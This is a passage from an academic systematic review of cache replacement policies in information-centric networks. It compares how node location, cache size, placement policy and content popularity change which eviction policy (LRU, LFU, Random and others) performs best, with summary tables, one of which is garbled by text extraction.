https://peerj.com/computer-science/ replacement policy should be instantiated in a given network scenario. In this way, we collected reported evidence from the surveyed articles about the effects of context variations on replacement schemes’ performance. We have found policy comparisons in different scenarios with variations of many aspects like request rates, forwarding strategies, number of consumers, number of contents, and overall topology. Nevertheless, in summary, we found that variations in the node location, cache size, cache placement policy and content popularity had some relevant effect on the policies’ performance. The first three presented variations resulting in different choices of replacement policies. Also, beyond the impact on the choosing point of which cache replacement schemes to apply, variations in cache size and content popularity presented other relevant effects related to the policies’ performance. We discuss the context variations separately in the following. To support the reading, Table 7 presents a description of the policies reported in this section. Node: location The works from Wang & Bensaou (2012a), Tarnoi et al. (2014), Gallo et al. (2014), Li, Simon & Gravey (2012) and Newberry & Zhang (2019) presented evidence of the impact of node’s location on cache replacement scheme choice. Table 8 summarizes the characteristics of the scenarios that supported the analyses. In the following, we discuss the reported impacts: � Wang & Bensaou (2012a) proposed two complementary replacement algorithms to handle different workload characteristics observed by both edge and intermediate router nodes. The eviction logic uses the hop count factor to prioritize the maintenance of more distant contents and, consequently, reduce network resource consumption. Besides the hop count, the replacement algorithm for intermediate nodes considers the number of node’s interfaces saved in the PIT entry for a content to estimate the diversity of the content requests. The proposed solution outperforms homogeneous configuration with LCE + LRU, and the results emphasize the benefits of using heterogeneous replacement policies according to the location of the node into the topology. However, the eviction solutions were evaluated only in conjunction with a proposed placement policy named PPC, limiting the analysis of the heterogeneous eviction solution separately. The proposed replacement schemes logic would be able to work together with other location policies, like LCE. � Li, Simon & Gravey (2012) used the LRFU policy with a weighting parameter y to represent a multi-policy caching where every content router implements its caching policy according to its location in the network. The LRFU behavior can switch to be more closely similar to LRU or LFU according to the value of y. The router location is relative to his position between users and servers. The routers (CRs) are classified according to a defined “entering degree”, which represents the number of the shortest path connecting front-end CRs with servers via a CR. The reasoning to configure different values of LRFU parameter y comes from an experiment under an emulated European Backbone Ebone topology with 40 nodes, in which they performed experiments with homogeneous configurations of y in all routers. They observed that the Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 17/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ routers with lower hit rate achieved their best performance with higher values of y, and on the contrary, routers with higher hit rates achieved their best performance with lower values of y. Allied to that, they also observed that the position of the router in the hit rate rank is directly proportional to his position in the topology, in the sense that the closer to the edge, the higher is the hit ratio performance. � The experiments of Tarnoi et al. (2014) reveal the difference of performances between LRU and Random according to the node position. For the experiment with a cascade network scenario and one content requester, LRU and Random, in combination with LCE placement policy, interchange positions on the rank of the cache hit performance: for the level 1, LRU outperforms Random, but from level 2 onward, LRU performance decreases drastically and Random also slightly decreases but now with better performance than LRU. The difference in the rank of cache hit rate is similar for the scenario variation with multiple content requests, but LRU and Random interchange position after the third level node. For the Internet topology, the result groups edge and core nodes, and again, LRU presented the best results for edge nodes while Random for core nodes. � Continuing the discussion about LRU and Random replacement policies, Gallo et al. (2014) came to a similar conclusion in terms of the difference in performance when varying node locations. For that, the authors presented an analysis of cache miss probability depending on the content popularity distribution. The analysis suggest that LRU and Random have significantly different performances only for popularity distributions highly concentrated on a relatively small number of objects. That difference is also relative to the position of the node in the topology. The more popular objects are more likely to be found at the edge node when using LRU, but those more popular objects can be more evenly distributed when using Random across the path. Also, the evaluation presents heterogeneous configuration for the leaves and root levels of a tree topology: LRU-Random and Random-LRU, also LRU-LRU and Random- Random. The heterogeneous LRU-Random configuration achieved better performance than the other configuration options, that is, LRU and Random configured respectively in the edge and intermediate levels. � While evaluating the advantages of integrating big data applications in an ICN-like architecture, Newberry & Zhang (2019) argue the benefits of using different cache replacement policies at each layer of a data center fat-tree topology. They compared the performance of homogeneous and heterogeneous policy configurations, placing the cache in each node of a fat-tree topology with three layers, composed of 16 core, 32 aggregation, and 32 edge switches. They performed combinations of the policies LRU, 2Q, ARC, LIRS, and MQ, on the levels of the tree topology, totaling 125 combinations for each variation of cache size. The results could reveal the different behaviors at different layers of the topology and the suitability of different policies at each level. However, the gain of the reported best heterogeneous configurations concerning the best homogeneous configuration is not explicit in the article. Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 18/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ Table 7 Set of content placement and replacement policies. Abbrev. Policy name Type Description References LRU Least recently used Replacement Removes the last accessed content in the cache – LFU Least frequently used Replacement Removes the last frequently used content in the cache – FIFO First-in-first-out Replacement Removes the oldest content placed in the cache – – Random Replacement Removes one content randomly – – Size Replacement Removes the content with largest size in the cache Abrams et al. (1996) LRFU Least recently/frequently used Replacement Considers the recency and frequency of contents to compute a Combined Recency and Frequency (CRF) metric. CRF values are higher for more recent and frequent contents. The policy evicts contents with lower CRFs Lee et al. (2001) FCDC Fast convergence caching replacement algorithm based on dynamic classification method Replacement Considers categories of contents by content’s popularity and a popularity rank by categories. Contents in lower ranked categories can be evicted for ones in higher ranked categories Chao et al. (2013) RUF Recent usage frequency Replacement Considers categories of contents by similarity and a popularity rank by categories. Contents in lower ranked categories can be evicted for ones in higher ranked categories Kang, Lee & Ko (2012) EV Energy efficiency cache scheme based on virtual round trip time Placement/ replacement Considers the energy consumption to store and to transport the content. Places the contents with storage energy smaller than their transport energy, and compares the energy saving of the cached contents with the energy saving of the passing content to evict the contents Wang et al. (2014a) PBRS Content-popularity and betweenness based replacement scheme Replacement Removes the content with the lower popularity. Computes the content popularity based on the content’s requests and node’s betweenness centrality Liu et al. (2019b) ABC Age-based cooperation Replacement Removes the content based on content’s Time-to-Live (TTL). Computes TTL based on the node’s location in the topology and the content popularity. The closer to the edge and/or the more popular a content, the longer its TTL value. Also called TTL Ming, Xu & Wang (2012) 2Q Two queues Replacement Designed for buffer management, it considers two lists of pages. The first list applies FIFO in the incoming page requests. The second list receives the pages in the first list requested again and their subsequent requests and applies LRU Johnson & Shasha (1994) ARC Adaptive replacement cache Replacement Designed for buffer management, it considers two LRU lists. The first list contains pages requested once in a recent time, and the second list pages requested at least twice. The policy adaptively decides the number of pages to maintain in each list according to the workload characteristic Megiddo & Modha (2003) LIRS Low inter-reference recency set Replacement Designed for buffer management, it considers the number of other pages accessed between the last and penultimate access for a page as Inter-Reference Recency (IRR) metric. The policy removes the page with the largest IRR Jiang & Zhang (2002) MQ Multi-queue Replacement Designed for buffer management, it considers multiple lists with different access frequencies for different periods Zhou, Philbin & Li (2001) PPC Popularity prediction caching Replacement Designed for video content. Predicts and caches the future most popular videos’ chunks based on the number of requests for neighboring chunks in the same video content. Evicts chunks with the least future popularity Zhang, Tan & Li (2018) (Continued) Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 19/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ All the scenarios discussed in this subsection concluded that heterogeneous policy configurations achieved the highest performances than the homogeneous configurations. Whether for small topologies (Tarnoi et al., 2014; Gallo et al., 2014) or larger topologies (Wang & Bensaou, 2012a; Li, Simon & Gravey, 2012; Tarnoi et al., 2014; Newberry & Zhang, 2019), the works observed different traffic characteristics in the different nodes. They attributed this difference to the node position and associated different policies to different traffic profiles. Multiple levels of caches naturally present that difference in traffic characteristics by cache-level due to the knowing filtering-effect. The filtering-effect happens any time a lower-level cache hits a content request. The cache does not propagate that request to the rest of the network and propagates only the miss requests to upper-level caches. This behavior modifies the original characteristics of the traffic. Many studies have been addressing the progressive filtering effect in hierarchical web caches (Williamson, 2002; Zhou et al., 2013; Melazzi et al., 2014). That filtering has a direct impact on the temporal locality of the requests (Jin & Bestavros, 1999). Temporal locality refers to the property that recently accessed objects are likely to be reaccessed in the near future. As cache levels Table 7 (continued) Abbrev. Policy name Type Description References CCP Cache policy based on content popularity Replacement Considers previous content popularity and the number of hits in a current interval of time to compute the current content popularity. The policy evicts less popular content Ran et al. (2013) Betw Betweenness centrality Placement Considers the node’s position at the topology in terms of node’s centrality measures to place the content. Only selected nodes with higher measures cache the content. Also called Leave- Copy-Betw (LCB), or Centrality Chai et al. (2012) LCD Leave copy down Placement Places the content only in the immediate downstream node of a cache-hit point Laoutaris, Syntila & Stavrakakis (2004) LCE Leave copy everywhere Placement Places the contents in all caches along the reverse path of the content request Laoutaris, Syntila & Stavrakakis (2004) Prob Probabilistic caching Placement Each cache in the reverse path of the content request stores the content with a constant probability p. Also called Leave- Copy-Probabilistically (LCP) Laoutaris, Syntila & Stavrakakis (2004) – ProbCache Placement Considers the shared storage capacity of the request path and the node’s distance to the content producer to calculate the node’s probability of caching the content; Also called PProb Psaras, Chai & Pavlou (2012) – CRCache Placement Considers the content popularity and the node’s centrality measures to calculate the probability of caching the content. The most popular contents are cached in the nodes with the highest centrality. Also called Cross Wang et al. (2014b) PCP Progressive caching policy Placement Considers the immediate downstream node of a cache-hit point to store the content, the number of interfaces saved in PIT entry for the intermediate nodes, and the number of requests for edge nodes Wang & Bensaou (2012a) Rand Single node random caching Placement Places the contents in one random intermediate node along the delivery path Eum et al. (2012) Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 20/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ filter requests, the temporal locality intensity becomes gradually weakening, and the traffic profile at upper-level caches becomes more random (Jin & Bestavros, 1999). That explains why Random policy achieved better performances for intermediate nodes in some of the discussed scenarios. As expected, workloads with temporal locality property have a strong correlation with caching policies (Garetto, Leonardi & Martina, 2016), and variations in the temporal locality patterns directly impact the variations of caching policies performances. Regarding the context attributes explored by the replacement schemes, only two of the works presented evaluations including context features in the eviction logic that helped differentiate the node’s position: like the node’s number of interfaces (Wang & Bensaou, 2012a) and the node degree as a general rank according to the topology (Li, Simon & Gravey, 2012). However, other works are exploring those, and other context attributes that could be helpful. The context attributes with their respective classification and reference works are: � Node-Location: node betweenness centrality (Chen et al., 2016; Liu et al., 2019b); � Node-Location: reachability of a node (Panigrahi et al., 2014); � Node-Location: node’s general rank according to topology position (Mick, Tourani & Misra, 2016; Aoki & Shigeyasu, 2017; Naz, Rais & Qayyum, 2016); � Node-Content-related: number of interfaces saved in PIT entry for a chunk (Wang & Bensaou, 2012a); � Node-Connectivity: one-hop neighbor nodes (Zhang et al., 2016); � Node-Resource: number of interfaces (Wang & Bensaou, 2012a; Baugh & Guo, 2018). Although the node’s location is a context that should be considered when selecting a replacement policy, it is not easy to foresee a straight map between policies and node positions. First, because there are many policies and diversity of topologies with different requirements, but mostly because there are other contextual factors that can also impact the performance of the policies. As we continue to show in the next sections, this SLR was able to pinpoint some of these factors. Node: cache size The works from Chao et al. (2013), Wang et al. (2014a), Sun et al. (2014), Newberry & Zhang (2019) and Liu et al. (2019b) contains evidence of cache size variations on the performance ranking variations of cache replacement policies. Table 8 summarizes the characteristics of the corresponding scenarios. In the following, we discuss the reported impacts: � According to Sun et al. (2014), the replacement scheme’s optimal choice depends on the cache size and the placement policy. The authors combined seven placement policies with five replacement policies: LRU, LFU, FIFO, TTL, Size - and cache size variations of 0.0007%, 0.007%, 0.07%, and 0.7% of the unique contents. The content routers have homogeneous cache sizes for all experiments. We observe that the most significant impact on the replacement scheme choice happens when passing from 0.0007% to Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 21/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ 0.007% of cache sizes. That is, for all combinations of placement policies, the best choice of replacement scheme changed when the cache size moved from 0.0007% to 0.007%. Meanwhile, for most combinations of placement policies, the experiments running with 0.007%, 0.07%, and 0.7% of cache sizes presented their highest performance values with the same replacement policy. For example, combined with LCE, LRU and TTL achieved the highest performances for 0.007% of cache size, while LFU stands out for the other sizes. � Chao et al. (2013) also show evidence that variations on cache size can lead to variations on the policy with the best performance. This work presents a content-based replacement policy named FCDC that manages the content popularity property— request count—to classify and replace contents according to popularity categories. The evaluation shows comparisons of the proposed scheme against LRU and RUF policies. According to the results, FCDC presents a better cache hit rate than LRU and RUF when the cache memory is less than 5%. Yet, the performance rank changed for cache sizes larger than 10%, and LRU performed slightly better than FCDC. The authors attribute this behavior to each policy’s property, in which FCDC can keep track of content popularity and maintain the most popular content better than LRU for small cache sizes. At the same time, LRU prioritizes most recently accessed over the most accessed and popular content. However, this does not directly correlate to the performance differences according to the cache sizes. FCDC deals with dynamic changes of content popularity and does not directly rely on node information. � Furthermore, the experiments performed by Wang et al. (2014a) also reveal differences in policy performance rank while varying the cache size. The work proposes the EV policy, a node-based replacement scheme coupled with a placement scheme. EV was evaluated and compared against LCE + LRU and LCE + Popu—a referenced popularity- based policy. The configuration of the content popularity follows a Zipf distribution, and besides the impact of different cache sizes, the results also reveal a correlation with the popularity skewness factor. For α skewness factor equals 0.8, EV and Popu had similar performances for all cache size variations. Meanwhile, for α = 1.5 or 2.0, the policies interchanged positions in the rank of average total energy consumption for different cache sizes: Popu achieved better performance than EV for cache sizes between 10% and 20% of total contents; for larger cache sizes, EV turns to be the better choice. The work does not provide an analysis of this effect. The results show the impact of cache size on placement and replacement schemes together, which limits the evidence of the eviction scheme solely. � Similarly, Liu et al. (2019b) presented evidences of variations in the rank of hit ratio of the policies for different cache sizes. The work shows evaluations of a proposed replacement policy named PBRS against LRU, LFU, and FIFO. PBRS and LFU interchange positions for different cache sizes in a tree topology. This effect is most evident for intermediate nodes, in which LFU presented better results for cache sizes between 10 MB to approximately 50 MB, and PBRS presented better cache hit values for larger cache sizes. Both policies rely on content popularity, but LFU computes the Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 22/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ popularity directly to count the number of requests, while PBRS increments the computation by adding different weights associated with the nodes. � Finally, besides the effect of heterogeneous policies for different node locations in a fat- tree topology observed by Newberry & Zhang (2019), we also observed variations in policy performances’ rank while varying cache sizes. The work evaluated LRU and other replacement policies named 2Q, ARQ, LIRS, and MQ policies. For a homogeneous policy configuration in all levels of the topology, the rank of policy performances did not change when using cache sizes from 64 to 512 MB. However, when cache sizes varied from 512 MB to 1 GB, a couple of changes happened in the rank: first, LRU and 2Q interchanged positions, in witch 2Q achieved best results than LRU up to 512 MB, but LRU presented better results for 1 GB; second, ARQ and MQ changed positions, with MQ presenting better results up to 512 MB and ARQ with 1 GB; and finally, LIRS and ARQ also changed positions in the rank, with LIRS presenting better results than all other policies up to 512 MB, but ARQ achieved better performance with 1 GB of cache size. For a heterogeneous policy configuration, the results presented similar effects on the rank. Without going into specific characteristics of policies, this work has evidence of the influence of cache size and the lack of explicit patterns that associate the performance of cache policies with the size of the cache. Regarding the impact on the replacement policy choice, in none of the presented works it is evident why variations in cache size led to different policy choices. Also, the analysis of the works together does not reveal potential patterns due to the heterogeneity of the scenarios factors. The scenarios range from country-wide router-level topology with around 80K routers to a small and straightforward linear topology, with variations of placement and replacement policies, and different ranges of cache size evaluations. Although the evidence clearly shows the relevance of cache size in particular scenarios, it is not sufficiently conclusive the why. Yet, we cataloged other effects concerning variations on the cache cache and the performance of the policies. It is natural to expect an increase in the cache size should increase the performance gain for any caching policy since there is more space to store contents. In practice, the constraints of memory access speed or node devices’ power will limit cache size. However, evidence shows that caching policies’ performance gain is not linear to the cache size increase (Han et al., 2014; Chen et al., 2014; Ong et al., 2014; Sun et al., 2014; Pires et al., 2018; Mangili, Martignon & Capone, 2013). In this way, adding cache resources on the network could not be the most suitable solution to improve the performance. The observed effect is because size allocation is a function of the content’s popularity distribution. For example, in scenarios with large amounts of non-popular content, the cache size may be small because the gain in caching is restrictive. On the contrary, for scenarios with a large amount of popular content, the benefits will be best achieved for larger cache sizes. In this way, balancing optimal cache size in terms of cost and effectiveness of policies shall be done considering the fluctuations in content popularity. Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 23/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ T ab le 8 S ce n ar io s co n ce rn in g re p la ce m en t p o li ci es ev al u at io n s w it h d if fe re n t ef fe ct s o n th e p o li cy ch o ic e. N et w o rk N o d e C o n te n t IC N ar ch it ec tu re R ef er en ce s T o p o lo gy N . C o n s. / N . P ro d . N . O b je ct s an d R eq u es ts L o ca ti o n o f th e n o d e C ac h e si ze P o p u la ri ty (Z ip f( a) ) C h u n k si ze P la ce m en t p o li cy E vi ct io n p o li cy M et ri cs E ff ec t W an g & B en sa ou (2 01 2a ) In te rn et -l ik e; 32 C R s – /2 80 .0 00 o b je ct s, ea ch w it h [1 - 24 47 ] o r [1 - 95 48 ] ch u n ks ; T o ta l o f 30 0. 00 0 o b je ct re q u es ts E d ge an d In te rm ed ia te [1 00 – 8, 00 0] ch u n ks [0 .9 2; 0. 78 ] an d [0 .9 6; 0. 74 ] 10 K B L C E an d P C P L R U ; P ro p o se d ed ge an d co re H it ra te ; H it ga in ; P at h st re tc h [N od e- lo ca ti on ] D if fe re n t p o li ci es fo r d if fe re n t n o d e lo ca ti o n s; L im it ed ev al u at io n L i, Si m on & G ra ve y (2 01 2) In te rn et -l ik e; 40 C R s 1, 00 0/ 3 50 0 o b je ct s, ea ch w it h [6 0– 12 0] ch u n ks ;T o ta l o f 45 .0 00 ch u n ks ; Si m u la ti o n ti m e o f 10 .0 00 m in E d ge an d In te rm ed ia te 10 0 ch u n ks 1. 0 – L C E L R U , L F U an d L R F U m u lt i- γ H it ra te ; N u m b er o f ac ce ss to se rv er [N od e- lo ca ti on ] D if fe re n t co n fi gu ra ti o n s o f L R F U fo r d if fe re n t n o d e lo ca ti o n s T ar n oi et al . (2 01 4) C as ca d e; 5 C R s 1/ 1 an d 4/ 1 1. 00 0 o b je ct s; Si m u la ti o n ti m e o f 10 .0 00 s E d ge an d In te rm ed ia te 10 , 20 , 50 , an d 10 0 o b je ct s [0 .4 – 1. 6] – L C E an d P ro b L R U , L F U an d R an d o m H it ra te ;S er ve r lo ad ; R o u n d tr ip h o p d is ta n ce [N od e- lo ca ti on ] L R U an d R an d o m in te rc h an ge p o si ti o n s fo r d if fe re n t n o d e lo ca ti o n s; [P la ce m en t- po li cy ] D if fe re n t ev ic ti o n p o li ci es fo r d if fe re n t p la ce m en t p o li ci es T ar n oi et al . (2 01 4) In te rn et -l ik e; 50 C R s 42 /8 8. 00 0 o b je ct s; Si m u la ti o n ti m e o f 10 .0 00 s E d ge an d In te rm ed ia te 80 , 16 0, 40 0, an d 80 0 o b je ct s [0 .4 – 1. 6] – L C E an d P ro b L R U , L F U an d R an d o m H it ra te ;S er ve r lo ad ; R o u n d tr ip h o p d is ta n ce [N od e- lo ca ti on ] L R U an d R an d o m in te rc h an ge p o si ti o n s fo r d if fe re n t n o d e lo ca ti o n s. [P la ce m en t- po li cy ] D if fe re n t ev ic ti o n p o li ci es fo r d if fe re n t p la ce m en t p o li ci es G al lo et al . (2 01 4) T re e; 3 C R s 2/ 1 20 .0 00 o b je ct s E d ge an d R o o t [1 0– 10 0] o b je ct s 1. 7 – L C E L R U an d R an d o m M is s p ro b ab il it y [N od e- lo ca ti on ] L R U an d R an d o m in te rc h an ge p o si ti o n s fo r d if fe re n t n o d e lo ca ti o n s N ew be rr y & Z h an g (2 01 9) D at a C en te r F at -t re e; 80 C R s – /1 28 – C o re , ag gr eg at io n , ed ge 64 , 12 8, 25 6, 51 2 an d 10 24 M B – 12 8 K B L C E L R U ,2 Q ,A R C , L IR S an d M Q T o ta l n et w o rk tr af fi c [N od e- lo ca ti on ] [C ac h e- si ze ] D if fe re n t p o li ci es fo r d if fe re n t n o d e lo ca ti o n s, fo r d if fe re n t ap p li ca ti o n s, an d fo r d if fe re n t ca ch e si ze s Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 24/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ T ab le 8 (c o n ti n u ed ) N et w o rk N o d e C o n te n t IC N ar ch it ec tu re R ef er en ce s T o p o lo gy N . C o n s. / N . P ro d . N . O b je ct s an d R eq u es ts L o ca ti o n o f th e n o d e C ac h e si ze P o p u la ri ty (Z ip f( a) ) C h u n k si ze P la ce m en t p o li cy E vi ct io n p o li cy M et ri cs E ff ec t C h ao et al . (2 01 3) – – 50 0 o b je ct s; 50 re q u es ts /s ; Si m u la ti o n ti m e o f 1. 08 0 s – [5 – 75 ] o b je ct s 1. 0 – – F C D C , L R U an d R U F H it ra te [C ac h e- si ze ] L R U an d F C D C in te rc h an ge p o si ti o n s fo r d if fe re n t ca ch e si ze s W an g et al . (2 01 4a ) C as ca d e; 5 C R s – 50 o b je ct s – ap ro x. [5 – 40 ] o b je ct s 0. 8, 1. 5, an d 2. 0 – L C E an d E V P la ce m en t L R U , E V R ep la ce m en t, an d P o p u E n er gy ef fi ci en cy [C ac h e- si ze ] D if fe re n t co m b in at io n s o f p la ce m en t an d re p la ce m en t p o li ci es fo r d if fe re n t ca ch e si ze s L iu et al . (2 01 9b ) T re e; 7 C R s 4 /1 1. 00 0 o b je ct s; ap ro x. 10 0 re q u es ts /s ; Si m u la ti o n ti m e o f 20 0 s E d ge an d In te rm ed ia te [1 0– 90 ] M B 0. 7 – L C E P B R S, L R U , L F U an d F IF O H it ra te [C ac h e- si ze ] L F U an d P B R S in te rc h an ge p o si ti o n s fo r d if fe re n t ca ch e si ze s Su n et al . (2 01 4) In te rn et -l ik e; 80 K C R s 16 m il li on / 22 1 M o re th an 50 0 K o b je ct s, w it h to ta l vo lu m e o f 13 7 T B ; 19 6 m il li on re q u es ts E d ge , M id d le , an d C o re 1 G B , 10 G B , 10 0 G B , an d 1 T B 1. 17 4 – L C E , L C D , R an d , P ro b, P P ro b , C en tr al it y an d C ro ss L R U , L F U , F IF O , T T L an d Si ze H it ra te ; T ra ffi c re d u ct io n ; Se rv er lo ad re d u ct io n [C ac h e- si ze ] [P la ce m en t- po li cy ] D if fe re n t ev ic ti o n p o li ci es fo r d if fe re n t ca ch e si ze s, an d fo r d if fe re n t p la ce m en t p o li ci es C h en et al . (2 01 6) W ir el es s M es h ; 15 C R s – T o ta l o f 30 0 re q u es ts ; Si m u la ti o n ti m e o f 1 h – 21 0 b yt es 0. 8 14 b yt es L C E , L C P , L C D , an d L C B L R U , L F U , R an d o m , an d F IF O H it ra ti o ; E n er gy co n su m p ti o n [P la ce m en t- po li cy ] D if fe re n t ev ic ti o n p o li ci es fo r d if fe re n t p la ce m en t p o li ci es N o te : C R , C o n te n t R o u te r; N . C o n s. /N . P ro d ., N u m b er o f co n te n t co n su m er s/ N u m b er o f co n te n t p ro d u ce rs . Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 25/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ Another observed effect of the relationship between cache size and replacement policy gain is that as the relative cache size increases, the performance difference among the techniques decreases (Charpinel et al., 2016; Han et al., 2014; Nakayama, Ata & Oka, 2015; Bilal & Kang, 2017; Xing et al., 2017; Panigrahi et al., 2014; Li, Simon & Gravey, 2012; Fricker et al., 2012b; Newberry & Zhang, 2019). That means that the performances tend to converge eventually, and this is in line with Che’s approximation (Che, Tung & Wang, 2002), which we briefly discuss here. The longest possible time between two sequential hits for a content c present in the cache, that is, before removing c from the cache, is expected to be random and related to c. That is the cache eviction time for content c. However, Che’s approximation stands that, for reasonably large cache sizes, this cache eviction time tends do be deterministic to the point of being a constant irrespective of the content. Therefore, as cache size increases, the dependance on c decreases and becomes negligible. Following this direction, if the dependance on the content decreases, the eviction policy’s dependance decreases because all contents converge to the same relevance in terms of eviction time. Although Che’s approximation has been proposed for a scenario with LRU under Independent Reference Model (IRM), other extensions and generalizations also show the approximation’s validity to more scenarios (Garetto, Leonardi & Martina, 2016; Fricker, Robert & Roberts, 2012a; Araldo, Rossi & Martignon, 2015). Cache placement policy ICN in-path cache works as an opportunistic cache to distribute the content along with the network, and that opportunistic characteristic makes more flexible the distribution of caches on network nodes and the content location choices. Once there is a cache, though, the replacement scheme is mandatory for all cache nodes. Nevertheless, both content placement and replacement decisions are closely correlated and influence each other behaviors. The decisions can be implemented separately and combined according to the network requirements. Each combination of placement and replacement policies can lead to different behaviors. On the other hand, both placement and replacement strategies may complement each other. Some of the replacement schemes reported in ICN literature are already coupled with a placement strategy (Neves dos Santos et al., 2013; Sinky et al., 2018; Ren et al., 2014; Hu et al., 2015; Pal & Kant, 2017; Xing et al., 2017; Mick, Tourani & Misra, 2016; Zhang, Tan & Li, 2017b; Wang et al., 2014a; Chen et al., 2017; Khan & Khan, 2017) and deployed in conjunction. In this work, we chose to look at the placement policy as a context factor that influences the replacement policy choice. This subsection presents the works (Chen et al., 2016; Tarnoi et al., 2014; Sun et al., 2014) in which variations in the placement policies led to different choices of replacement schemes: � Chen et al. (2016) develop an ICN WSN system in which they tested 16 combinations between four placement strategies: LCE, Prob (i.e., LCP), LCD, and Betw (i.e., LCB)— and four replacement policies: Random, FIFO, LFU, and LRU—in a WSN with 15 nodes. The results reveal a significant variation in the rank of policies for different Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 26/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ combinations of placement policies and comparison metrics. Considering the metric cache hit rate, LCE and Prob achieved their best results combined with LFU, while LCD and Betw with Random; Yet, when considering the metric energy consumption, LCE and Prob achieved their best results with FIFO, while LCD with LRU, and LCB with Random. � In addition to analyzing the effect of heterogeneous policies configuration by node locations, Tarnoi et al. (2014) also analyzed variations on the replacement scheme choice according to the different placement policies. The work shows how the probabilistic caching placement behavior varies as a function of the replacement scheme. The authors evaluated combinations of LRU, LFU, and Random policies with LCE and Prob. In general, for both cascade and Internet-like topologies, and considering both server load and round trip-hop distance evaluation metrics, the results show that Prob can improve the performance of the network and achieve its best performance only when combined with LRU, while LCE achieves its best performance when in conjunction with LFU. � Finally, as we mentioned earlier, the results reported by Sun et al. (2014) show that the optimal choice of the replacement scheme depends on the cache size and the placement policy. Regarding the variations of placement policies, the work combined seven placement policies: LCE, LCD, Rand, Prob, ProbCache, Betw (i.e., Cent), and CRCache (i.e., Cross)—with five replacement policies: LRU, LFU, FIFO, TTL, and Size—and the results presented evidence of the difference in performance ranks for each combination. For example, considering the metric server load reduction and 1G of cache size, LCE, Rand, Prob, and ProbCache achieved its highest values when combined with TTL; while LCD with FIFO; Betw with LRU; and CRCache with TTL or LRU. However, for cache sizes of 100G and 1T, all placement policies presented their best results with LFU, except for LCD, which achieved the best results combined with LRU or TTL. The work also stands for a dominant strategy among the compared ones in terms of caching metrics. Partially in line with Chen et al. (2016), and contrary to the analysis presented by Tarnoi et al. (2014), the authors place Prob + LFU as the closest to the best strategy for their scenario. However, the analysis between the different results is limited because the two works (Chen et al., 2016; Sun et al., 2014) did not mention the probability value used for caching contents. The Prob performance may vary according to the configured probability value. Reinforcing the intrinsic correlation property between content placement and replacement decisions, all the works presented in this section show evidence of the different and unique effects of each policy’s combinations for distinct scenarios. Different placement policies can have a different impact when changing a replacement scheme (Rezazad & Tay, 2015; Tarnoi et al., 2015; Zhang et al., 2017a; Meddeb et al., 2017). This way, each placement strategy requires evaluation of what replacement scheme performs the better. Each placement policy has a different requirement in terms of evictions, and the more is the number of evictions, the more the placement policy relies on the replacement scheme and, therefore, is affected accordingly. Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 27/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ Content: popularity One of the behaviors we were expecting to find evidence for was the impact of content popularity variation on the replacement policy choice, especially on the choice between frequency-based policies, for example, LFU, and others, like recency-based policies. That reasoning relies on the argument of many works that frequency-based policies suit better content populations with high popularity skewness, while with low popularity skewness would suit other policies (Beck et al., 2017). However, while analyzing the variations of popularity skewness during the comparative evaluation of the replacement schemes, we found works in which popularity skewness variations did not influence policies’ rank (Wang et al., 2011; Gür, 2015; Huang et al., 2017; Zhang, Tan & Li, 2018; An & Luo, 2018; Jeon, Lee & Song, 2013; Shailendra et al., 2016; Liu et al., 2017; Tarnoi et al., 2014; Gallo et al., 2014; Yokota et al., 2016; Zhang, Tan & Li, 2017b; Sinky et al., 2018; Yao et al., 2016). Those comprehend works under Zipf popularity distribution, with different variations of the skew factor from, for example, 0–2, with conventional policies like LRU and LFU as well new proposed policies, but the performance rank among the policies remained unchanged. Variations in the skew factor represent variations in the distribution of contents’ popularity. The increase in the factor leads to an increase in the number of popular content. It is also associated with the diversity among contents. The increase in the number of popular contents reduces the diversity of the contents stored in the caches since popular contents are more conducive to occupy cache spaces for relatively long times. Also, we observed a similar effect as the one about the increasing of cache size discussed earlier: under variations of the skew factor solely, as the skew factor increases, the difference of performance among the techniques decreases (Badov et al., 2014; Yokota et al., 2016; Zhang, Tan & Li, 2017b; Zhang, Tan & Li, 2018; Sinky et al., 2018; Yao et al., 2016). For instance, during the evaluation of a proposed PPC policy, Zhang, Tan & Li (2018) carried out experiments varying the Zipf skew factor from 0.7 to 1.2. They compared the policy performance against LRU, LFU, FIFO, and CCP. The results reveals that as the factor increases, the difference of cache hit ratio among the replacement schemes is reduced and tends to converge. Remaining remarks This section presented many scenarios with evaluations of cache replacement policies that presented different behaviors according to variations in contexts. Contextual factors are triggering this difference in performance, and this SLR was able to identify some common factors in a set of works, as we exposed in the previous subsections. The influence of some contextual factors was already evident when looking at individual works. However, one of our intentions with this SLR was to analyze the works that had similar effects, to look for patterns that could relate the contextual factors to the policy’s properties. That cames in contrast with the diversity of scenario characteristics and evaluated policies, which limited the analysis. Besides, there was no more in-depth analysis of why and how the effects happened, most of the works came to evidence by testing the context variations, and small changes in the characteristics of the scenarios Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 28/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ could have lead to different results. In general, there was no explicit pattern in the surveyed works that associated the context factor to 